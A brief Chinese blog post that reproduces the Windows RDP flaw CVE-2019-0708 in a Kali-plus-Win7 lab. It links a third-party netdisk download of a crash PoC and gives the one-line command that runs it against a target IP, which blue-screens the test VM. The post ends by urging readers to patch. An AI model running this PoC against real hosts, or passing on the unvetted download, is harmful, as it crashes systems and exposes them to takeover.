CVE-2019-0708漏洞复现

CVE-2019-0708漏洞复现

  • 1. 漏洞简介
  • 2. 影响版本
  • 3. 复现步骤

在远程桌面连接时,POC生效,可以使用虚拟机测试。我用的KaliLinux+win7虚拟机

1. 漏洞简介

2019年5月14日,微软发布了本月安全更新补丁,其中修复了远程桌面协议(RDP)远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,向目标Windows主机发送恶意构造请求,可以在目标系统上执行任意代码。由于该漏洞存在于RDP协议的预身份验证阶段,因此漏洞利用无需进行用户交互操作。该漏洞存在被不法分子利用进行蠕虫攻击的可能。

2. 影响版本

CVE-2019-0708漏洞复现_第1张图片

3. 复现步骤

  1. 下载漏洞POC
    网盘下载:https://pan.baidu.com/s/1QBsTQEiHBSAih60x4_9I-A
    提取码 96ec
  2. 使用POC
#python crashpoc.py <目标IP> <系统类型64/32>
python crashpoc.py 172.16.122.159 64

CVE-2019-0708漏洞复现_第2张图片
win7 虚拟机已经蓝屏,这次漏洞是 永恒之蓝级别。若是有中招的小伙伴赶紧去官方下载补丁,或者使用360修复
CVE-2019-0708漏洞复现_第3张图片

你可能感兴趣的:(CVE-2019-0708漏洞复现)